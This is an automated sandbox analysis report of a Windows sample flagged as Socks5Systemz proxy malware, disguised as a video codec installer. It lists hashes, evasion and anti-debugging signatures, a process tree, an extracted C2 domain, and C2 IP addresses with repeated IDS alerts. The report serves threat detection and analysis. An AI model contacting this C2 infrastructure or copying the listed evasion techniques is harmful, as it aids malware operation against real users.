Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
L9rm7AX4mp.exe

Overview

General Information

Sample name:L9rm7AX4mp.exe
renamed because original name is a hash value
Original sample name:0396163369529cd5b010e3c35a2066c5.exe
Analysis ID:1524739
MD5:0396163369529cd5b010e3c35a2066c5
SHA1:c3f58efd6dc957d0baf6eb71e0f6539e5eb3d596
SHA256:31d2bac123d451caed79ced03b80592dacc3499f6c91a9e32630d3590d52a6c0
Tags:exeSocks5Systemzuser-abuse_ch
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Machine Learning detection for dropped file
PE file has a writeable .text section
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • L9rm7AX4mp.exe (PID: 4856 cmdline: "C:\Users\user\Desktop\L9rm7AX4mp.exe" MD5: 0396163369529CD5B010E3C35A2066C5)
    • L9rm7AX4mp.tmp (PID: 4996 cmdline: "C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp" /SL5="$20420,8045603,54272,C:\Users\user\Desktop\L9rm7AX4mp.exe" MD5: 16C9D19AB32C18671706CEFEE19B6949)
      • zextervideocodec32_64.exe (PID: 1216 cmdline: "C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exe" -i MD5: 4AC9B0BE70B6E01BFD47FFA47289DED7)
  • cleanup

Malware Configuration

Threatname: Socks5Systemz

{"C2 list": ["ezebtfp.ua"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3288808434.0000000002BC1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
    00000003.00000002.3288670577.0000000002B20000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
      Process Memory Space: zextervideocodec32_64.exe PID: 1216JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security

        Sigma Signatures

        No Sigma rule has matched

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-03T08:39:57.996325+020020494671A Network Trojan was detected192.168.2.549711185.208.158.24880TCP
        2024-10-03T08:39:58.879562+020020494671A Network Trojan was detected192.168.2.549712185.208.158.24880TCP
        2024-10-03T08:40:01.788816+020020494671A Network Trojan was detected192.168.2.549712185.208.158.24880TCP
        2024-10-03T08:40:02.620011+020020494671A Network Trojan was detected192.168.2.549715185.208.158.24880TCP
        2024-10-03T08:40:03.096771+020020494671A Network Trojan was detected192.168.2.549715185.208.158.24880TCP
        2024-10-03T08:40:03.912593+020020494671A Network Trojan was detected192.168.2.549717185.208.158.24880TCP
        2024-10-03T08:40:04.832385+020020494671A Network Trojan was detected192.168.2.549718185.208.158.24880TCP
        2024-10-03T08:40:05.669677+020020494671A Network Trojan was detected192.168.2.549719185.208.158.24880TCP
        2024-10-03T08:40:06.018610+020020494671A Network Trojan was detected192.168.2.549719185.208.158.24880TCP
        2024-10-03T08:40:06.831497+020020494671A Network Trojan was detected192.168.2.549720185.208.158.24880TCP
        2024-10-03T08:40:08.481850+020020494671A Network Trojan was detected192.168.2.549721185.208.158.24880TCP
        2024-10-03T08:40:08.830452+020020494671A Network Trojan was detected192.168.2.549721185.208.158.24880TCP
        2024-10-03T08:40:09.645985+020020494671A Network Trojan was detected192.168.2.549722185.208.158.24880TCP
        2024-10-03T08:40:10.454749+020020494671A Network Trojan was detected192.168.2.549723185.208.158.24880TCP
        2024-10-03T08:40:11.275120+020020494671A Network Trojan was detected192.168.2.549724185.208.158.24880TCP
        2024-10-03T08:40:11.624286+020020494671A Network Trojan was detected192.168.2.549724185.208.158.24880TCP
        2024-10-03T08:40:11.967613+020020494671A Network Trojan was detected192.168.2.549724185.208.158.24880TCP
        2024-10-03T08:40:12.328222+020020494671A Network Trojan was detected192.168.2.549724185.208.158.24880TCP
        2024-10-03T08:40:13.668706+020020494671A Network Trojan was detected192.168.2.549725185.208.158.24880TCP
        2024-10-03T08:40:14.019252+020020494671A Network Trojan was detected192.168.2.549725185.208.158.24880TCP
        2024-10-03T08:40:14.838729+020020494671A Network Trojan was detected192.168.2.549726185.208.158.24880TCP
        2024-10-03T08:40:15.663948+020020494671A Network Trojan was detected192.168.2.549727185.208.158.24880TCP
        2024-10-03T08:40:16.468813+020020494671A Network Trojan was detected192.168.2.549728185.208.158.24880TCP
        2024-10-03T08:40:17.286665+020020494671A Network Trojan was detected192.168.2.549729185.208.158.24880TCP
        2024-10-03T08:40:18.088017+020020494671A Network Trojan was detected192.168.2.549730185.208.158.24880TCP
        2024-10-03T08:40:18.439019+020020494671A Network Trojan was detected192.168.2.549730185.208.158.24880TCP
        2024-10-03T08:40:19.251332+020020494671A Network Trojan was detected192.168.2.549731185.208.158.24880TCP
        2024-10-03T08:40:20.057528+020020494671A Network Trojan was detected192.168.2.549732185.208.158.24880TCP
        2024-10-03T08:40:20.409920+020020494671A Network Trojan was detected192.168.2.549732185.208.158.24880TCP
        2024-10-03T08:40:21.226324+020020494671A Network Trojan was detected192.168.2.549733185.208.158.24880TCP
        2024-10-03T08:40:22.025545+020020494671A Network Trojan was detected192.168.2.549734185.208.158.24880TCP
        2024-10-03T08:40:22.376751+020020494671A Network Trojan was detected192.168.2.549734185.208.158.24880TCP
        2024-10-03T08:40:23.198191+020020494671A Network Trojan was detected192.168.2.549735185.208.158.24880TCP
        2024-10-03T08:40:23.546290+020020494671A Network Trojan was detected192.168.2.549735185.208.158.24880TCP
        2024-10-03T08:40:23.890737+020020494671A Network Trojan was detected192.168.2.549735185.208.158.24880TCP
        2024-10-03T08:40:24.748977+020020494671A Network Trojan was detected192.168.2.549736185.208.158.24880TCP
        2024-10-03T08:40:25.095004+020020494671A Network Trojan was detected192.168.2.549736185.208.158.24880TCP
        2024-10-03T08:40:25.951345+020020494671A Network Trojan was detected192.168.2.549737185.208.158.24880TCP
        2024-10-03T08:40:26.309689+020020494671A Network Trojan was detected192.168.2.549737185.208.158.24880TCP
        2024-10-03T08:40:26.660761+020020494671A Network Trojan was detected192.168.2.549737185.208.158.24880TCP
        2024-10-03T08:40:27.473539+020020494671A Network Trojan was detected192.168.2.549738185.208.158.24880TCP
        2024-10-03T08:40:28.281045+020020494671A Network Trojan was detected192.168.2.549739185.208.158.24880TCP
        2024-10-03T08:40:29.573724+020020494671A Network Trojan was detected192.168.2.549740185.208.158.24880TCP
        2024-10-03T08:40:29.920486+020020494671A Network Trojan was detected192.168.2.549740185.208.158.24880TCP
        2024-10-03T08:40:30.274094+020020494671A Network Trojan was detected192.168.2.549740185.208.158.24880TCP
        2024-10-03T08:40:31.086834+020020494671A Network Trojan was detected192.168.2.549741185.208.158.24880TCP
        2024-10-03T08:40:31.954102+020020494671A Network Trojan was detected192.168.2.549742185.208.158.24880TCP
        2024-10-03T08:40:32.796761+020020494671A Network Trojan was detected192.168.2.549743185.208.158.24880TCP
        2024-10-03T08:40:33.609989+020020494671A Network Trojan was detected192.168.2.549744185.208.158.24880TCP
        2024-10-03T08:40:34.425353+020020494671A Network Trojan was detected192.168.2.549745185.208.158.24880TCP
        2024-10-03T08:40:35.274022+020020494671A Network Trojan was detected192.168.2.549746185.208.158.24880TCP
        2024-10-03T08:40:36.073350+020020494671A Network Trojan was detected192.168.2.549747185.208.158.24880TCP
        2024-10-03T08:40:36.429599+020020494671A Network Trojan was detected192.168.2.549747185.208.158.24880TCP
        2024-10-03T08:40:37.238142+020020494671A Network Trojan was detected192.168.2.549748185.208.158.24880TCP
        2024-10-03T08:40:38.061539+020020494671A Network Trojan was detected192.168.2.549749185.208.158.24880TCP
        2024-10-03T08:40:38.412198+020020494671A Network Trojan was detected192.168.2.549749185.208.158.24880TCP
        2024-10-03T08:40:39.225451+020020494671A Network Trojan was detected192.168.2.549750185.208.158.24880TCP
        2024-10-03T08:40:40.026491+020020494671A Network Trojan was detected192.168.2.549751185.208.158.24880TCP
        2024-10-03T08:40:40.389709+020020494671A Network Trojan was detected192.168.2.549751185.208.158.24880TCP
        2024-10-03T08:40:40.732228+020020494671A Network Trojan was detected192.168.2.549751185.208.158.24880TCP
        2024-10-03T08:40:41.558714+020020494671A Network Trojan was detected192.168.2.549752185.208.158.24880TCP
        2024-10-03T08:40:41.908031+020020494671A Network Trojan was detected192.168.2.549752185.208.158.24880TCP
        2024-10-03T08:40:42.893022+020020494671A Network Trojan was detected192.168.2.549753185.208.158.24880TCP
        2024-10-03T08:40:43.713226+020020494671A Network Trojan was detected192.168.2.549754185.208.158.24880TCP
        2024-10-03T08:40:44.063249+020020494671A Network Trojan was detected192.168.2.549754185.208.158.24880TCP
        2024-10-03T08:40:44.974334+020020494671A Network Trojan was detected192.168.2.549755185.208.158.24880TCP
        2024-10-03T08:40:46.182575+020020494671A Network Trojan was detected192.168.2.549756185.208.158.24880TCP
        2024-10-03T08:40:46.530399+020020494671A Network Trojan was detected192.168.2.549756185.208.158.24880TCP
        2024-10-03T08:40:47.354128+020020494671A Network Trojan was detected192.168.2.549757185.208.158.24880TCP
        2024-10-03T08:40:48.187718+020020494671A Network Trojan was detected192.168.2.549758185.208.158.24880TCP
        2024-10-03T08:40:49.043864+020020494671A Network Trojan was detected192.168.2.549759185.208.158.24880TCP
        2024-10-03T08:40:49.396093+020020494671A Network Trojan was detected192.168.2.549759185.208.158.24880TCP
        2024-10-03T08:40:50.227981+020020494671A Network Trojan was detected192.168.2.549760185.208.158.24880TCP
        2024-10-03T08:40:51.027289+020020494671A Network Trojan was detected192.168.2.549761185.208.158.24880TCP
        2024-10-03T08:40:51.381067+020020494671A Network Trojan was detected192.168.2.549761185.208.158.24880TCP
        2024-10-03T08:40:52.430482+020020494671A Network Trojan was detected192.168.2.549764185.208.158.24880TCP
        2024-10-03T08:40:53.253641+020020494671A Network Trojan was detected192.168.2.549765185.208.158.24880TCP
        2024-10-03T08:40:54.075772+020020494671A Network Trojan was detected192.168.2.549766185.208.158.24880TCP
        2024-10-03T08:40:54.886719+020020494671A Network Trojan was detected192.168.2.549767185.208.158.24880TCP
        2024-10-03T08:40:55.242928+020020494671A Network Trojan was detected192.168.2.549767185.208.158.24880TCP
        2024-10-03T08:40:56.045580+020020494671A Network Trojan was detected192.168.2.549768185.208.158.24880TCP
        2024-10-03T08:40:56.394950+020020494671A Network Trojan was detected192.168.2.549768185.208.158.24880TCP
        2024-10-03T08:40:57.227686+020020494671A Network Trojan was detected192.168.2.549769185.208.158.24880TCP
        2024-10-03T08:40:58.064857+020020494671A Network Trojan was detected192.168.2.549772185.208.158.24880TCP
        2024-10-03T08:40:59.087367+020020494671A Network Trojan was detected192.168.2.549773185.208.158.24880TCP
        2024-10-03T08:40:59.934414+020020494671A Network Trojan was detected192.168.2.549774185.208.158.24880TCP
        2024-10-03T08:41:00.787445+020020494671A Network Trojan was detected192.168.2.549775185.208.158.24880TCP
        2024-10-03T08:41:01.898165+020020494671A Network Trojan was detected192.168.2.549776185.208.158.24880TCP
        2024-10-03T08:41:02.736191+020020494671A Network Trojan was detected192.168.2.549777185.208.158.24880TCP
        2024-10-03T08:41:03.596214+020020494671A Network Trojan was detected192.168.2.549778185.208.158.24880TCP
        2024-10-03T08:41:04.426341+020020494671A Network Trojan was detected192.168.2.549779185.208.158.24880TCP
        2024-10-03T08:41:05.350713+020020494671A Network Trojan was detected192.168.2.549780185.208.158.24880TCP
        2024-10-03T08:41:07.092511+020020494671A Network Trojan was detected192.168.2.549781185.208.158.24880TCP
        2024-10-03T08:41:07.965780+020020494671A Network Trojan was detected192.168.2.549782185.208.158.24880TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Found malware configuration
        Source: zextervideocodec32_64.exe.1216.3.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["ezebtfp.ua"]}
        Multi AV Scanner detection for submitted file
        Source: L9rm7AX4mp.exeReversingLabs: Detection: 23%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Machine Learning detection for dropped file
        Source: C:\ProgramData\EMAIL Safe Storage 10.2.46\EMAIL Safe Storage 10.2.46.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0045D4EC GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045D4EC
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0045D5A0 ArcFourCrypt,1_2_0045D5A0
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_0045D5B8 ArcFourCrypt,1_2_0045D5B8
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

        Compliance

        barindex
        Detected unpacking (overwrites its own PE header)
        Source: C:\Users\user\AppData\Local\Zexter Video Codec\zextervideocodec32_64.exeUnpacked PE file: 3.2.zextervideocodec32_64.exe.400000.0.unpack
        Source: L9rm7AX4mp.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Zexter Video Codec_is1Jump to behavior
        Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: L9rm7AX4mp.tmp, 00000001.00000002.3288367581.0000000002383000.00000002.00000001.01000000.00000006.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039453112.00000000031B0000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000003.2039392721.000000000209C000.00000004.00001000.00020000.00000000.sdmp, L9rm7AX4mp.tmp, 00000001.00000002.3287918641.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, _isdecmp.dll.1.dr
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00452A4C FindFirstFileA,GetLastError,1_2_00452A4C
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004751F8 FindFirstFileA,FindNextFileA,FindClose,1_2_004751F8
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464048
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_004644C4
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00462ABC FindFirstFileA,FindNextFileA,FindClose,1_2_00462ABC
        Source: C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmpCode function: 1_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00497A74

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49711 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49728 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49722 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49741 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49761 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49729 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49712 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49759 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49743 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49719 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49753 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49746 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49731 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49720 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49736 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49750 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49723 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49724 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49745 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49738 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49727 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49765 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49730 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49748 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49737 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49733 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49726 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49721 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49754 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49766 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49747 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49742 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49767 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49758 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49734 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49717 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49780 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49782 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49744 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49777 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49755 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49781 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49756 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49752 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49779 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49732 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49768 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49774 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49769 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49718 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49764 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49739 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49749 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49776 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49740 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49725 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49778 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49772 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49751 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49715 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49760 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49735 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49773 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49775 -> 185.208.158.248:80
        Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49757 -> 185.208.158.248:80
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: ezebtfp.ua
        Source: global trafficTCP traffic: 192.168.2.5:49714 -> 89.105.201.183:2023
        Source: Joe Sandbox ViewIP Address: 185.208.158.248 185.208.158.248
        Source: Joe Sandbox ViewIP Address: 89.105.201.183 89.105.201.183
        Source: Joe Sandbox ViewASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
